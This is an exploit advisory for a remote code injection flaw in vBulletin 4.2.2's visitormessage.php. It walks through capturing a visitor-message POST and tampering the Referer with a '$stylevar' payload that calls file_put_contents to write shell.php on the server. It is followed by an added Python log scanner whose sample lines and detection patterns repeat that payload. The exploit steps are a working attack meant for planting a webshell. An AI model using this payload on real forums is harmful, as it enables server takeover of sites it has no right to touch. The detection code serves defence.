Aerosol

vBulletin 4.2.2 Remote Code Injection


#################################################################################################################
[+] Exploit Title: vBulletin 4.x.x 'visitormessage.php' Remote Code Injection Vulnerability
[+] Discovered By: Dariush Nasirpour (Net.Edit0r)
[+] My Homepage: black-hg.org / nasirpour.info
[+] Date: [2015 27 February]
[+] Vendor Homepage: vBulletin.com
[+] Tested on: [vBulletin 4.2.2]
[+] Greeting : Ali Razmjoo - Ehsan Nezami - Arash Shams - Ramin Shahkar and all my friends ( #bhg )
#################################################################################################################
Remote Code Injection:
+++++++++++++++++++++++++
1) You Must Register In The vBulletin http://www.victim.com/register.php example:[blackhat]

2) go to your user profile example: [http://black-hg.org/cc/members/blackhat.html]

3) post something in visitor message and record post data with live http header

[example] : message_backup=&message=For-Test-Sample&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse=

4) change message to anything "For-Test-Sample" => "ALEEEEEEEEX" [because vBulletin doesn't let you send the same comment in a time]

[Now post this with hackbar:]

URL: http://black-hg.org/cc/visitormessage.php?do=message

[Post data]
message_backup=&message=ALEEEEEEEEX&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse=

[And referrer data:]
PoC : http://black-hg.org/cc/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked[u can upload shell]")}}]"

5) Open hackbar and tamper it with tamper data:
referrer data has been URL encoded by the browser, you have to replace this again with tamper data: http://black-hg.org/cc/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked[you can upload shell]")}}]"

and submit request.

################################################################################################################
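
A defender-side check for the request pattern the advisory describes, as an added example that is not part of the original post: it scans web-server access logs for POSTs to visitormessage.php whose Referer carries PHP interpolation syntax, in raw or percent-encoded form. The combined log format, the host forum.example, the sample lines and all function names are assumptions.

```python
import re
from urllib.parse import unquote

# Apache/nginx "combined" format; the Referer field may contain \" escapes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>(?:[^"\\]|\\.)*)"'
)
# PHP interpolation syntax has no business in a Referer URL.
MARKERS = {
    "php-complex-variable": re.compile(r"\$\{"),
    "stylevar-reference": re.compile(r"\$stylevar\s*\[", re.I),
}

def decode(value, rounds=3):
    """Percent-decode repeatedly so single- and double-encoded forms match."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def referer_findings(referer):
    """Return the sorted names of the markers found in a Referer value."""
    text = decode(referer)
    return sorted(name for name, rx in MARKERS.items() if rx.search(text))

def scan(lines):
    """Return (client_ip, findings) for each suspicious visitor-message POST."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        if not m["path"].split("?", 1)[0].endswith("/visitormessage.php"):
            continue
        found = referer_findings(m["referer"])
        if found:
            hits.append((m["ip"], found))
    return hits

# Constructed sample log lines (documentation addresses, hypothetical host).
SAMPLE_LOG = [
    r'198.51.100.4 - - [27/Feb/2015:09:58:10 +0000] "POST /cc/visitormessage.php?do=message HTTP/1.1" 200 431 "http://forum.example/cc/members/blackhat.html" "Mozilla/5.0"',
    r'203.0.113.7 - - [27/Feb/2015:10:01:02 +0000] "POST /cc/visitormessage.php?do=message HTTP/1.1" 200 431 "http://forum.example/cc/members/blackhat.html?a=$stylevar[${${file_put_contents(\"shell.php\",\"x\")}}]\"" "Mozilla/5.0"',
    r'203.0.113.9 - - [27/Feb/2015:10:03:40 +0000] "POST /cc/visitormessage.php?do=message HTTP/1.1" 200 431 "http://forum.example/cc/members/blackhat.html?a=%24stylevar%5B%24%7B%24%7Bx%7D%7D%5D" "Mozilla/5.0"',
]
```

A hit means the request was attempted, not that it succeeded; pair it with a check of the forum's web root for PHP files created after the logged timestamp.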
